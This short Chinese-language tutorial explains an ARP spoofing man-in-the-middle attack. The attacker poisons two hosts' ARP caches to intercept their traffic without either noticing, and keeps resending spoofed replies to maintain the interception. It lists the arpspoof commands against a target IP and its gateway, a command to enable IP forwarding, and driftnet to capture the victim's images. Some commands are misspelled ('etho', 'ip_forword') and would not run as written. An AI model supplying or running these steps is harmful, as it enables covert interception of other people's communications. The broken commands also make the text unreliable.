實例 三臺主機之間,IP分別爲ip1 ip2 ip3,物理地址分別爲MAC1 MAC2 MAC3,1要嗅探2和3之間的通信數據,1先向2發送一個ARP應答報文,其中包含的映射關係爲ip3/MAC1,2收到這個應答後,更新自己的緩存,保存映射關係ip3/MAC1;隨後1向3發送一個ARP應答報文,其中包含的映射關係爲ip2/MAC1,3收聽到應答之後,更新自己的緩存,保存映射關係ip2/MAC1,至此2和3通信的數據都將發給1
截取信息之後,1可以把數據轉發到正確的目的地,而2和3都無法察覺到嗅探。鑑於arp緩存會定期更新,所以只要在小於更新時間間隔的頻率發送ARP欺詐報文,就可以持續的嗅探了。
命令:(Linux環境)
arpspoof -i eth0 -t 172.28.15.53(目的ip地址) .......(目的IP的網關)【欺詐主機】
etho 1 > /proc/sys/net/ipv4/ip_forword(保存到指定目錄)
driftnet(監聽圖片)
arpspoof -i eth0 -t 172.28.15.254(目的IP的網關) .......(目的IP地址)【欺詐網關】
